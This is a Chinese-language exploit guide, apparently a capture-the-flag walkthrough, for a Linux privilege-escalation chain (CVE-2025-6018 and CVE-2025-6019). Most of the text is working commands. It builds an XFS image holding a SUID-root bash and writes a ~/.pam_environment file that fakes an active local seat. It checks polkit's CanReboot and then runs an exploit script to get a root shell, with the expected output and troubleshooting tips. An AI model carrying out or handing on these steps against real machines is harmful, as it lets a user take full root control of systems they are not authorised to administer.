CVE-2025-6018 + CVE-2025-6019 权限提升指南
📋 快速利用步骤
步骤1:在本地机器上准备XFS镜像
# Create 300MB XFS image
dd if=/dev/zero of=xfs.image bs=1M count=300
mkfs.xfs -f xfs.image
# Mount and install SUID bash
mkdir mnt
sudo mount -t xfs xfs.image mnt
sudo cp /bin/bash mnt/bash
sudo chmod 4755 mnt/bash
sudo umount mnt
rmdir mnt
# Verify (should show 300M)
ls -lh xfs.image
步骤2:上传文件到目标机器
步骤3:首次登录 - 配置PAM
# SSH login to target
ssh [email protected]
# Write PAM environment variables
cat > ~/.pam_environment << 'EOF'
XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1
EOF
# Verify configuration
cat ~/.pam_environment
# 🔥 Critical: Logout (to activate PAM config)
exit
步骤4:第二次登录 - 执行权限提升
# Re-login via SSH (PAM config now active)
ssh [email protected]
# Verify PAM is active (should return "('yes',)")
gdbus call --system --dest org.freedesktop.login1 \
--object-path /org/freedesktop/login1 \
--method org.freedesktop.login1.Manager.CanReboot
# Execute privilege escalation script
bash exp.sh
✅ 成功标志
如果利用成功,你应该看到:
✓ SUID bash found: /tmp/blockdev_loop0_xfs_xxxxx/bash
✓ Root access confirmed!
════════════════════════════════════════════════════════════
║ ROOT FLAG ║
║ <flag_here> ║
════════════════════════════════════════════════════════════
bash-5.2# whoami
root
🔧 故障排除
| 问题 | 解决方法 |
|---|
CanReboot 返回 ('no',) | 确保你已退出并重新登录(步骤3) |
|
📌 关键点
- ✅ 必须退出并重新登录:PAM配置仅在新会话中生效
- ✅ 验证 CanReboot:在运行脚本前确认它返回
('yes',)
- ✅ 使用SSH登录:不要使用
ssh -t user@host "cmd" 这种执行方式
🐱 猫咪守护者
如果失败,请确保严格按顺序执行每一步!